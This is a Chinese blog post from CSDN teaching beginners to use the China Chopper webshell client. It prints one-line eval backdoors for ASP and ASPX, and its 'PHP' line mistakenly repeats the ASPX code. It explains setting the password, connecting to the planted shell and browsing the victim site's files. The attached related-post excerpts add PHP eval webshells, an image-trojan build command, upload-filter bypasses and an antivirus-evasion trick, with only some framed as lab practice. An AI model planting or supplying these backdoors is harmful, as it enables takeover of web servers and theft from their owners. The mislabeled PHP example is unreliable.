中国菜刀的使用

最新推荐文章于 2022-07-03 18:36:58 发布
最新推荐文章于 2022-07-03 18:36:58 发布
阅读量5.7k 收藏 16
点赞数 5
分类专栏: 网络安全博文 文章标签: 中国菜刀 shell asp php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lvoyee/article/details/13167903
版权

中国菜刀的使用,为自己和新手一起分享的。大牛看了勿喷!

        说到菜刀,我们第一想到的是一句话了。这里就说说一句话的类型,常常有的asp,aspx,php。


        asp一句话:<%eval request("pass")%>

        aspx一句话:<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

        php一句话:<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>


       这里写的只是常见的,在各个类型中还衍生了许多的变种一句话,我们在使用的时候,更改里面的"pass"就可以了,例如asp一句话:<%eval request("123")%>,这里的密码就是123。aspx和php也是同理,改好对应的便可以用了。在这里 给大家一个建议,可以收集各类的一句话,分类别保存,在用到的时候就方便多了。

       在插入一句话后,我们接下来就是连接了。打开菜刀:在空白地方右击 选择添加,如下图


在“地址”这里填上你插入一句话的文件的地址,后边的那个小框填的是你的一句话的密码,其他的不用填, 填完之后单击“添加”,就可以了。添加完毕后,你的这个一句话的shell会显示到主界面里,右击它,选择“文件管理”,就可以看到网站上的文件了 。然后你可以做你想做的事了。

伊成
关注
专栏目录
mysql中国菜刀连接_中国菜刀使用方法以及小技巧
weixin_34938347的博客
02-08 1861
相信大多数的站长都用FTP来管理web空间,但是相对于菜刀来说FTP简直弱到爆.就数据库管理方面来说,phpmyadmin和帝国软件只能管理mysql数据库,而且在软件的体积上跟菜刀完全没法比,如果精通SQL语法,何必还要PHPMYADMIN呢?而且中国菜刀以其特色图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS,支持ADO方式连接的数据库。服务端:在服务端运行的代...
中国菜刀使用(实战正确姿势)
weixin_49071539的博客
12-17 1万+
图片上传漏洞: ps:此教程为靶场实战,切勿用于非法用途 1. 准备制作图片马,随便找到一张图片重命名为1.jpg 2. 准备好一句话木马,这里我命名为1.php 3. 需要用到dos命令将两个文件合到一起,windows+R 输入cmd回车。找到存放文件的路径,输入命令:copy 1.jpg/b + 1.php/a 2.jpg文件夹中会自动生成一个2.jpg文件。 4. 选择上传2.jpg 5.上传,使用bp抓包更改后缀,将filename后面的.jpg改为.php,转发。 6. 可以看到上传
菜刀的基本使用
ChenZIDu的博客
09-22 1528
看到随便上传,想到一句话木马,然后上传一个 <?php eval($_POST['a']); ?> 然后显示上传成功,点击进去查看发现 没有成功,他屏蔽了<?php,几个字符。 发现还有另一种JS(javascript)脚本风格的写法 <script language="PHP"> @eval($_POST["code"]); &lt...
菜刀的用法
小兴的学习笔记
12-13 1874
1.一句话木马 PHP //加容错代码 @eval($_POST['angel']) //绕过<?限制 //绕过某些限制 ASP ASPX 2.连接菜刀 如下图:右键--添加即可。 angel为 $_POST['angel']这里的angel相当于密码。 然后就可以操作了。 菜刀下载地址:菜刀
中国菜刀的作用详细介绍和使用说明(黑站神器与侧门运用检测工具)
xhlylxhl的博客
08-29 2181
中国菜刀,1个很好用而又强劲的webshell,它并不是用于切黄瓜的煮饭的道具哦,是这款技术专业的网址管理系统软件,尺寸只能300多KB,简直精巧好用啊!只有被犯罪分子运用到,就是说1个黑站的神器了。我还记得之前触碰的那时候探求了好长时间才用到,嘿嘿。。之后理解以后才发觉并不会太难实际操作,一起作用也比我想像的要强劲。 配置图: 注:独立的菜刀沒有实际效果,必须服务端有一段话侧...
中国菜刀使用教程
qq1140037586的博客
06-28 1506
中国菜刀使用教程
中国菜刀使用与原理分析
热门推荐
weixin_45597678的博客
12-04 1万+
中国菜刀的功能 中国菜刀使用 原理分析
中国菜刀使用(图片上传漏洞)
m0_71088505的博客
07-03 1294
图片上传漏洞: ps:此教程为靶场实战,切勿用于非法用途 1.准备制作图片马,随便找到一张图片重命名为1.jpg 2.准备好一句话木马,这里我命名为1.php 3. 需要用到dos命令将两个文件合到一起,windows+R 输入cmd回车。找到存放文件的路径,输入命令:copy 1.jpg/b + 1.php/a 2.jpg 文件夹中会自动生成一个2.jpg文件。 4. 选择上传2.jpg 5.上传,使用bp抓包更改后缀,将filename后面的.jpg改为....
中国菜刀使用介绍
m0_37786014的博客
12-04 1746
一、简介 服务器只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过IDS的能力大幅提高。 目前支持的服务端脚本:PHPASP、.NET,并且支持、https安全连接的网站 在服务器端运行的代码如下: PHP:<?php @eval($_POST['pass'];?)> ASP:<%eval request("pass")%> ASP.NET:...
菜刀如何连接mysql_中国菜刀之终端操作及数据库管理
weixin_29798625的博客
02-10 2935
实验环境操作机:Windows XP目标地址:172.16.12.2实验目的认识中国菜刀工具熟练使用中国菜刀工具进行网站文件管理、数据库管理、使用虚拟终端等操作。实验内容内容预览尝试执行命令自定义终端路径配置数据库相关参数读取数据库信息和执行sql语句虚拟终端操作中国菜刀的虚拟终端功能其实是通过相应的脚本函数执行系统命令并取得返回信息。小i提示:在本次实验中,请注意实验工具、实验文件存放路径,不同...
菜刀php教程,中国菜刀(chopper)功能介绍及使用教程
weixin_34774527的博客
03-09 5743
中国菜刀(下载地址:)是一个非常好用而又强大的webshell,它可不是用来切菜的做饭的道具哦,是一款专业的网站管理软件,大小只有300多KB,真是小巧实用啊!不过被不法分子利用到,就是一个黑站的利器了。我记得以前接触的时候摸索了好久才会用,哈哈。。后来领悟之后才发现并不难操作,同时功能也比我想象的要强大。注:单独的菜刀没有效果,需要服务器端有一句话后门,或漏洞,例如这样的:89/mingfang...
解决中国菜刀连接失败问题
Suuannnn的博客
11-07 8383
今天上传了一个一句话木马,但是怎么也连接不上,抓了个包发现我的php里面的代码出现了特殊字符。 原来原因就出在了编码上,于是我回去检查了一下自己的编码,原来是一不小心用了utf16,把他换回utf8就OK了,心酸!!记录一下 ...
使用中国菜刀(结合一句话木马)通过Iiswriter的put方法getshell
wsnbbz的博客
12-30 3517
1.在客户端安装iiswrite软件,并关闭客户端防火墙 2.服务器安装iis,勾选以下选项 3.更改iis网站的主目录,将所有权限都勾选,再将网址的权限里来宾账户的权限改为完全控制 4.在客户机使用iiswrite对服务器所在文夹件上传一个txt文件并改后缀为asp,内容为<%eval(eval(chr(114)+chr(101)...
菜刀轻松砍杀安全狗 asp一句话中转脚本
weixin_34168880的博客
10-28 407
看到很多朋友看了我的PHP中转脚本http://phpinfo.me/2014/02/01/309.html ,问我那个脚本只能中转PHP的,但是asp的呢 asp连接的时候安全狗拦截的正是菜刀POST里的eval("Ex"%26cHr(101)%26"cute关键字, 那么只需替换下,替换成eval("Ex"%26cHr(101)%26cHr(99)%26"ute即可秒杀之 于是有了如下...
菜刀和一句话木马
weixin_44720762的博客
05-02 3863
中国菜刀,一个非常好用而又强大的webshell webshell就是以aspphp、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。 在博主本人看来,对于一名网安小白来说,这段解释对理解webshell没有丝毫帮助。webshell:web:网站 shell:命令语言。执行用户输入的命令或者说执行预先设定好的一连串的命令 也就是一种具有命令效果的网页代码,...
asp 一句话小马_木马分析一句话木马制作和“菜刀”的使用
weixin_39528525的博客
12-29 1万+
1.什么是webshellWeb 即 web服务也就是网站Shell 即人机交互界面,取得对服务器/电脑某种程度上的操作权限。Webshell即拿到网站服务器的权限(shell)比如我在cmd下的命令操作就可以叫get shell ,获得电脑操作权限。2.怎么才能get shell使用木马可以帮我们拿到shell,达到控制网站服务器的目的,也称为网站的后门。常见的木马:asp一句话...
DVWA中国菜刀连接不上问题(低安全级别就连不上,看看这!!)
S__White的博客
10-30 6057
测试环境:虚拟机搭建DVWA,php7.3.4 连接工具:中国菜刀 安全级别:LOW 上传一句话木马过程省略 解决发生: 解决问题: 将php版本降低为php5.0即可 (小白一枚,解决第一个问题,记录一下,希望可以帮到很多人!!) ...
中国菜刀使用教程--ctf 文件上传
weixin_40729735的博客
11-07 5655
首先把包含一句话的文件上传,php内容文件如下: <?php eval($_POST['a']); ?> 如果会过滤 <? 和 php 关键字,可以使用长标签 <script language="pHp">@eval($_POST['sb'])</script> 打开中国菜刀主页面,右键点击添加,配置如下(密码即上面的sb) 点击...
linux菜刀使用教程,中国菜刀使用教程
weixin_42514777的博客
05-05 1136
下载地址:x01介绍中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体中文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。(引用于百度百科菜刀的界面:1305452-20180808210011001-1761784351.png (54.61 KB, 下载次数: 5)2019-9-26 17:...
Kali Linux中Dmitry与Weevely的使用教程
中国的“菜刀”工具相比,Weevely提供了更丰富的功能,但仅支持PHP后门的创建和管理。对于初学者来说,Weevely可能需要一定的学习曲线,因为它只提供命令行界面。 三、Weevely的使用步骤 1. 在Kali Linux终端启动...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值